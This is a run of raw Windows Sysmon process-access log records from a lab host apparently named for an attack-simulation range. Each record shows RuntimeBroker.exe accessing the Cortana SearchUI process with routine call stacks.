12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007220Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246072C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007219Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246072C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007218Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245876C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007217Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245752C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007216Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49244504C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007215Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245752C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007214Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49244504C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007213Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007212Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245332C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007211Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245864C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007210Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49242684C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007209Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245332C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007208Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245864C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007207Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49242684C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007206Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007205Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246000C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007204Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246000C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007203Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007202Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 